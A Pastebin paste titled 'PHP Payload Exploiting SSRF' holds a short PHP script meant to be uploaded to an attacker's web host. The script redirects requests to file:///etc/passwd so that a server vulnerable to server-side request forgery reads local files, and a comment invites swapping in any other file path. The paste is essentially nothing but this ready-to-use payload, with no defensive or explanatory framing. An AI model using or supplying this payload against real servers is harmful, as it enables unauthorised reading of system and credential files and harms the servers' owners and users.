ToKeiChun

PHP Payload Exploiting SSRF

Aug 27th, 2019
386
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.14 KB | None | 0 0
  1. <?php
  2. //Upload this file payload to your webhost
  3. header("Location: file:///etc/passwd"); // You can change it to file:///path/to/file
  4. ?>
Add Comment
Please, Sign In to add comment